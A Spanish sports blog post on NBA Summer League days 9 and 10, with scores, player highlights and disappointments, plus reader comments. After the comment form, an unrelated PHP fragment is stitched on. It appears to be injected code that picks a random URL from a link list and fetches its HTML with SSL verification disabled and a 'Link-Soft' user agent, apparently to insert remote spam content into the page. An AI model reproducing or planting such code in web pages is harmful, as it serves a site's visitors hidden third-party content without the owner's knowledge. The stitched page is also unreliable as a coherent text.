Summer Leagues: Días 9 y 10

17 de July de 2013 por rumbero

Día 9

Los Bobcats siguen dando muchos minutos a los jugadores que probablemente acompañaran a los Kemba, Henderson y Al Jefferson en la rotación y eso se nota. Ganaron bien a unos Knicks que no pudieron contar con la presencia de Tim Hardaway Jr (84-71). Mientras, los Pelicans ganaban en un ajustado final a los Cavs 62-66 gracias al acierto de su backcourt Rivers-Roberts que parece estar funcionando bastante bien. Los Wolves acababan perdiendo un partido que llegaron a dominar por 20 puntos por culpa de un game winner de Marcus Morris a falta de poco más de 2 segundos. Exhibición de unos Morris Brothers que van bastante sobrados.

Había derbi angelino y se lo llevaron los Lakers 77-65. Que aprovechen ahora que durante la regular seguro les va a costar bastante más. Seguidamente tuvimos un Warriors-Kings con las miradas puestas en McLemore y su puntería. No tuvo el día tampoco mientras que su compañero McCallum volvía a sorprender gratamente pero Con Bazemore y Green como referencia ganaron los de la bahía por 66-80. Para acabar la jornada, los Spurs se deshicieron de los Hawks 96-87 y el quinteto titular de los Bulls se combinaba para tener un acierto del 50% en tiros de campo y 52% en triples y dar cuenta de los Nuggets 93-81

DESTACADOS

Cody Zeller & Jeff Taylor: Otro día más los mejores de los Bobcats. El alero sueco promedia 21 puntos en estos 3 primeros partidos con un 50% en FG y mejorando notablemente su tiro de larga distancia con un 40% en 3P. Muy fiable hasta el momento. Zeller volvió a demostrar algo de su repertorio cerca del aro y se fue con 18 puntos y 10 rebotes.  Buenas impresiones está causando teniendo en cuenta las dudas que hay puestas en él. 

Tyler Zeller & Dion Waiters: Otra parejita que suele ser la mejor de su equipo estos días. Buena SL de Tyler, ayer acabó con 15/12 y el escolta con 16/2/2. No se le vió con tantas “ganas” como contra los Grizzlies por eso, y por ahí acabaron cayendo ante los Pelicans.

Lance Thomas: Partido bastante coral de todos los jugadores de los Pelicans así que nos quedamos con el del recientemente despedido Thomas (para hacer hueco a Stiemsma). 14 puntos sin fallo y 10 rebotes para él.  Algo tarde igual. Austin Rivers y Brian Roberts siguen en su buena línea y le ayudaron con 13 puntos para el primero y 11 y 6 asistencias para el segundo.

Robbie Hummel: El ex del Obradoiro está siendo el mejor de estos Wolves. 18 puntos y 7 rebotes para él y tirando por encima del 60% en esta SL. Quiere jugar en la NBA, veremos si alguien le hace hueco.

Hermanos Morris: A otro nivel. 22/6 para Markieff y 18/4/3 para Marcus con game winner incluido. Están para más que la Summer League y ahí andan demostrándolo. En Phoenix deberían planteárselo al menos.

Ray McCallum: Si ya nos gustó en el primer partido ayer se salió siendo de largo el mejor de los Kings.  23 puntos, 3 rebotes, 1 asistencia, 6 robos y 1 pérdida. Sin miedo a atacar al aro saca un buen número de faltas a la vez que sabe que no es buen tirador de larga distancia por lo que no se vuelve loco intentándolo. Buen defensor también, con mucha intensidad que le permite robar esa cantidad de balones. Lástima que teniendo a Vasquez y Thomas por delante lo veremos poco posiblemente.

Marcus Landry: ¿No quieren los Lakers un 3/4 con buena mano? Pues aquí lo tenemos, promediando 14.7 puntos y 4.3 rebotes. De lo más destacable de los angelinos en estos partidos

Kent Bazemore & Draymond Grenn & Ian Clark: Buena SL de Bazemore demostrando que puede ser un jugador muy completo en ambos lados de la cancha. 15 puntos, 6 rebotes,  5 asistencias, 1 robo y 5 pérdidas. Ayer se le unió Green con 18 puntos, 4 rebotes y 3 asistencias y su dosis de energía habitual. Para acabar, ya hablamos de la buena SL que hizo Clark con los Heat en Orlando y sigue demostrando la buena mano que tiene: 14 puntos en 20 minutos con un 50% de acierto en FG y 3P. Si alguien busca un buen tirador baratito podría servir

Mike Scott: Explotó el sophomore de los Hawks con 27 puntos y 7 rebotes. Jugando de 4 va a tener demasiada competencia esta temporada.

Aron Baynes & Nando de Colo: 19 puntos y 15 rebotes para el pívot de los Spurs. Buena defensa e imponiendo su físico que es lo que tiene. Se le unió De Colo en su mejor versión con 19 puntos y 8 asistencias y tuvieron suficiente para ganar a los Hawks. Aprovechamos para acordarnos del “tapado” DeShaun Thomas: 17 puntos, 4 rebotes.  A piñón fijo.

Quinteto de los Bulls: 88 de los 93 puntos que metieron los de Chicago fueron de los titulares.  Está claro que Goudelock le robó algo de su esencia a Kobe y sigue en plan estrátosferico. 31 puntos (10/13 FG y 5/6 3P). Malcolm Thomas se fue a los 12 puntos y 22 rebotes. Posiblemente no le nombraremos ya nunca más pero ahí están sus números. Mientras Marcus Teague se fue a los 15 puntos y 7 asistencias (repartió las mismas ante los Grizzlies) y está jugando una buena SL. Los rookies de este año tampoco se querían quedar al margen de la fiesta. Tony Snell estuvo  fallón en el tiro (y prácticamente es lo único que tiene) pero se fue con 11 puntos y 5 rebotes y Erik Murphy acabó con 18 y 4/5 en triples demostrando la buena mano que tiene y bastante más controlado con las faltas (llegó a las ¡10! El otro día)

A SEGUIR

CJ Leslie: 15 puntos y 5 rebotes para el undrafted. De lo mejorcito de los Knicks ayer ante la baja por lesión de Hardaway Jr. Necesita mejorar ese tiro de media/larga distancia que suple con sus buenas condiciones físicas

Carrick Felix: A falta de poder ver a Bennet y Karasev hay que echarle un ojo al rookie. No lo habíamos nombrado hasta ahora y hoy seguramente no sería el día ya que viene de su partido más flojo pero promedia unos buenos 10.5 puntos y 8.5 rebotes con 40% de acierto. Buen defensor,  aporta intensidad gracias a su capacidad atlética. Va bien al rebote y es cerca de la canasta donde suele ser más peligroso aunque por los registros se ve que está mejorando con su tiro. Otro más para los Cavs.

Kendall Marshall: Está jugando una aceptable SL aunque con la llegada de Bledsoe lo va a tener entre difícil e imposible. Ya suena que puede salir del equipo. El ritmo al que se juega en la SL le viene bien más que bien. 13 puntos y 6 asistencias en busca que alguien confíe en él.

Dennis Schroeder & Mike Muscala & Lucas Nogueira: El alemán ha alternado buenas actuaciones con otras más grises. Ayer no tuvo un buen día con un 2/8 FG, 1 rebote, 3 asistencias y 3 pérdidas. A los que le ven ya como la versión joven de Rondo deberán esperar algo más. Muscala anda más o menos igual y su teórico buen repertorio ofensivo no está siendo demasiado efectivo hasta el momento. Finalmente Nogueira se está mostrando como el más sólido gracias en parte al físico que gasta. 6 puntos 9 rebotes para él ayer.

DECEPCIONES

Shabazz Muhammad: “Muy flojita” sería la definición hasta el momento de la Summer League de Shabazz. Para lo que tiene acostumbrados a algunos, no está tirando demasiado pero tampoco con gran acierto (37% FG y 28 % 3P). Igual porque sabe que esos son los tiros que le van a dejar durante la temporada o bien porque quiere adaptar algo su juego, pero tampoco está produciendo en otros apartados. Promedia 1.5 rebotes y 0.5 asistencias.

Gorgui Dieng: Apenas jugó 11 minutos pero le dio tiempo a fallar sus dos tiros a canasta, coger 1 rebote, hacer 4 faltas, perder 5 balones y demostrar más bien poco de su buena defensa que es básicamente para lo que sirve

Archie Goodwin: 1/4 FG, 0/3 FT, 1 rebote, 5 pérdidas en 18 minutos. Debe trabajar más su tiro para ampliar su repertorio ofensivo y con la capacidad que tiene para entrar a canasta y sacar faltas. Tiempo tiene.

Ben McLemore: El chaval debe  acabar los partidos pensando que le mueven la canasta. Estuvo bastante mejor que el primer día pero no era complicado. 4/14 FG y 1/7 3P para acabar con 14 puntos, 4 rebotes y 4 pérdidas. Sigue sin tener cogida la distancia desde lejos demostrándolo con un par de airballs de lo más bonitos. Vamos a tener paciencia.

Día 10

10 días llevamos ya de Summer League. Ayer tuvimos una jornada con 8 partidos que abrieron Wolves y Heat con victoria de los primeros gracias a su acierto en el tiro durante todo el partido (80-71). Toronto daba cuenta de los Kings a costa de su trio de sophomores pero en Sacramento andarán contentos con el buen partido (por fin) de McLemore (70-81). Mientras los Warriors establecían un récord encadenando 10 victorias consecutivas en SL gracias a los Bucks (84-72). Un día más volvió a gustar Bazemore. Seguidamente tuvimos uno de los mejores partidos hasta el momento. Bulls y Blazers se iban a la prórroga gracias al espectacular final de partido del rookie McCollum. Ahí aparecía la magia de Goudelock otra vez para meter todos los puntos de los Bulls y ganar el partido 80-78. Después de este plato fuerte vimos como los Grizzlies volvían a perder esta vez ante unos Suns que siguen invictos 100-88. No hizo falta la mejor versión de los hermanos Morris. Parra cerrar el día Washington se imponía claramente a Denver 97-69 en un partido con poca emoción y la selección de la D-League ganaban su tercer partido (82-75) esta vez ante los Mavs

DESTACADOS

Ben McLemore: Esperábamos verlo más pronto que tarde por esta sección y aquí lo tenemos. 26 puntos (8/14 FG y 3/6 triples) con 3 rebotes y 5 pérdidas. Y eso que empezó el partido comiéndose una buena chapa de Valanciunas. No sabemos si es que está trabajando en la mecánica de tiro y su memoria muscular se está aclimatando o ha sido simplemente un buen día. A su favor diremos también que tuvo a Terrence Ross defendiéndolo un buen rato.

Jonas Valanciunas: 18 puntos, 8 rebotes….9 faltas y 7 pérdidas (aunque es cierto que a él le pegaban palos cada vez que recibía el balón y los árbitros se hacían los suecos). Pero en general dominó  la pintura y con él y Ross en pista fue cuando los Raptors inclinaron la balanza para llevarse el partido (14 puntos, 6 rebotes, 4 robos y 4 pérdidas para el escolta).

John Henson: Este tiene que entrar de cabeza en nuestro selecto grupo de “Jugadores con potencial” y a ver qué pasa.  9 puntos (3/10), 15 rebotes, 8 pérdidas y 3 tapones para el sophomore.

Marcus Teague: Más dedicado a la dirección de juego en los anteriores partidos (en gran parte por la flor en culo que tenía medio equipo de los Bulls de cara al aro) ayer acabó el partido con 25 puntos, 1 rebote, 3 asistencias, 1 robo y 4 pérdidas. Aprovechamos estas líneas para destacar la prórroga de Goudelock que no tuvo un partido estratosférico como los anteriores pero que dio la victoria a los Bulls con sus 5 puntos en el OT.

CJ McCollum: Es la leche este tío. 27 puntos,  6 rebotes, 1 asistencia y 3 pérdidas.  Tremenda la soltura con la juega el chaval y la capacidad anotadora que tiene. Sus últimos 5 min de partido con triple incluido a falta de 10 segundos para forzar la prórroga son de lo mejorcito de esta SL. A ver de que es capaz con los mayores pero de momento pinta bien.

Thomas Robinson: Le dimos un palo el otro día sabiendo que puede dar más y parece haber surgido efecto. 12 puntos, 18 rebotes, 2 asistencias, 1 robo, 4 pérdidas y 1 tapón. Entre él y McCollum pueden darle una rotación a los Blazers que no tuvieron la temporada pasada desde el banquillo.

Archie Goodwin: Otro al que le sientan bien las reprimendas. Se salió con 22 puntos y 4 rebotes. Puede ser un buen robo de este draft con sólo 18 años.

Josh Akognon: Está siendo la referencia ofensiva de los Mavs en esta SL promediando 19.3 puntos por partido. Ayer acabó con 20/4 y 3 robos.

A SEGUIR

Gorgui Dieng: Volvió a jugar poquito pero haciéndolo mucho mejor que el día anterior. 6 puntos, 5 rebotes, 1 asistencia, 3 robos y 1 tapón en 13 minutos. Bien en defensa, en ataque se limita a meter para abajo las que le dejan cerquita del aro.

Dwight Buycks: Ya resaltamos la buena SL de Buycks con los Thunder y recordamos que era FA. Luego viene Ujiri a leerse el blog para llamar a la puerta del jefe diciendo que tiene visto un base baratito que es cojonudo. Eso no vale. Se estrenaba ayer con los Raptors después de firmar el contrato pero no tuvo un día especialmente bueno. 9 puntos, 2 asistencias, 2 robos y 5 pérdidas.

Scott Machado: Sabe que está más fuera que dentro y se le vieron muchas ganas ayer en los 15 minutos que estuvo en pista. 5 puntos, 1 rebote, 4 asistencias y 3 robos y dirigiendo bien al equipo

Tony Snell & Erik Murphy: Buen partido de los rookies de Chicago. El primero se fue casi a los 40 minutos con 14 puntos, 6 rebotes, 4 asistencias y 2 robos. Parece que va cundiendo el trabajo que está haciendo con Pippen. Murphy jugó sólo 13 min para acabar con 10/5 y volver a mostrar que tiene muy buena mano desde el triple.

Glen Rice Jr: Sigue jugando buenos minutos. A falta de poder ver más a Porter (tuvo que retirarse a los 6 minutos) está siendo de lo mejor de los Wizards. 13 puntos, y 2 asistencias en 24 minutos con 50% en tiros de campo.

Gal Mekel & Ricky Ledo: Ya comentamos que el base israelí está  sorprendiendo gratamente y que ante la falta de bases en los Mavs podría tener algunos minutos. Ayer acabó con 7 puntos, 2 rebotes, 9 asistencias, 3 robos y 6 pérdidas. Que no empañe esto último su partido, estuvo muy bien como director de juego ante el potente combinado de la D-League. Ledo sigue demostrando su buena mano y acabó con 5/10 FG y 3 rebotes aunque perdió 5 balones.

DECEPCIONES

Shabazz Muhammad: Partido casi calcado al anterior. Está intentando jugar más en equipo y no tirar todas las que le llegan pero no consigue ni una cosa ni la otra. 3/10 ayer, 3 rebotes, 1 asistencia y 3 pérdidas. Igual sería mejor verlo en su versión de chupón.

Nate Wolters: Dudamos en ponerlo en esta sección. No se puede decir que esté siendo una decepción pero tampoco anda fino el base de Milwaukee en esta SL. Volvió a estar mal en el tiro y se quedó en un 2/7. Está promediando 30% en FG y sin haber metido un triple aún. Acabó con 10 puntos, 3 rebotes, 2 asistencias, 2 robos y 3 pérdidas. Lo hacemos por su bien.

Comenta

6 comentarios a esta entrada

  1. rumbero dice:
    #1

    Que conste en acta que la jornada 9 está escrita antes de la de ayer pero por problemas logísticos no pudo ser enviada a tiempo. Es que leído del tirón suena muy ventajista el “vamos a tener paciencia” con McLemore 😀

      Citar

  2. Sancho88 dice:
    #2

    Me gusta mucho el base de la D-League, el Hannah este, es un artista, hace canastas muy guapas y está jugando de puta madre los tres partidos. A ver si alguien le da una oportunidad…

      Citar

  3. jhc dice:
    #3

    Una duda, los equipos que jugaron en las vegas no vuelven a jugar

      Citar

  4. Denise dice:
    #4

    jhc:
    Una duda, los equipos que jugaron en las vegas no vuelven a jugar

    ¿te refieres a la de Orlando que fue antes, no? Los Heat participan en las dos, en la de Orlando y en la de Las Vegas

      Citar

  5. jhc dice:
    #5

    Entonces me imagino que los Detroit no se han apuntado, me quede con ganas de ver más a Cadwell-Pope

      Citar

  6. Denise dice:
    #6

    jhc:
    Entonces me imagino que los Detroit no se han apuntado, me quede con ganas de ver más a Cadwell-Pope

    Detroit solo participó en la de Orlando.
    Caldwell-Pope acabó con 14 puntos, 4 rebotes y 1,5 asistencias en 28 minutos de media, aunque con muy malos porcentajes, 37% en tiros de campo y 22% desde el triple.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>